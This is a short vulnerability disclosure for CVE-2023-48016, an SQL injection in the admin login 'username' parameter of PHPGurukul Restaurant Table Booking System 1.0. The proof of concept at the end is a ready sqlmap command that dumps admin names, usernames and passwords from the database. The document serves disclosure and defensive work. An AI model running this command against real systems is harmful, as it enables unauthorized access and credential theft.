CVE-2023-48016-restaurant-table-booking-system-SQLInjection.md

CVE-2023-48016-restaurant-table-booking-system-SQLInjection

• Exploit Author: Serhat ÇİÇEK

Vendor Homepage

• https://phpgurukul.com/restaurant-table-booking-system-using-php-and-mysql/

Software Link

• https://phpgurukul.com/restaurant-table-booking-system-using-php-and-mysql/

Overview

• PHPGurukul Restaurant Table Booking System 1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'username' parameter in the 'rtbs/admin/index.php' file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.

Vulnerability Details

• CVE ID: CVE-2023-48016
• Vulnerable File: /rtbs/admin/index.php
• Parameter Name: username

References

• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48016
• https://nvd.nist.gov/vuln/detail/CVE-2023-48016

Description

• The lack of proper input validation and sanitization on the 'username' parameter allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database

Proof of Concept (PoC) :

• sqlmap -u "http://localhost/cvee/resturant-table/rtbs/admin/" --data "username=admin&inputpwd=test&login=" -D rtbsdb -T tbladmin -C AdminName,AdminuserName,Password --dump